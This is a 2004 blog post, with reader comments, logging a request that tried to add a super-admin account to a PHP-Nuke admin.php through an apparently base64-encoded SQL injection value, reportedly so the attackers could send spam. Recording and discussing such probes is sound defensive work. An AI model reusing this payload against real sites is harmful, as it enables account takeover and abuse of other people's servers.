April 29, 2004

php exploit for mail

Host: 200.158.71.145 (Brazil based IP)
Url: /admin.php?op=AddAuthor&add_aid=kiegera&add_name=Goda
&add_pwd=playboya&add_email=r00t_System@hush.com&
add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Http Code : 404

Date: Apr 29 10:29:33
Http Version: HTTP/1.0"
Size in Bytes: 777

Referer: -
Agent: Mozilla 4.0 (Linux)

Looks like our formerly Microsoft FrontPage attacking friends from Brazil are at it again. However, this time they are a bit more advanced and tried to add themselves as a user to a non-existent php install in order to send spam. Cute.

Posted by joy at April 29, 2004 10:39 AM | TrackBack
Comments

Me too! (Well, blog.org actually, but still) from 200.177.162.127, also brazil...

Posted by: Harald at May 2, 2004 10:53 AM

I've noticed these visits on our site as well, also from Brazil, same script running. Actually they are looking for a security hole in PHP Nuke, which seems to exist for a while. There's a thread in their support forums with a description what happens once they've found a victim:
http://phpnuke.org/modules.php?name=Forums&file=viewtopic&t=2627

Posted by: Olliver at May 29, 2004 03:49 AM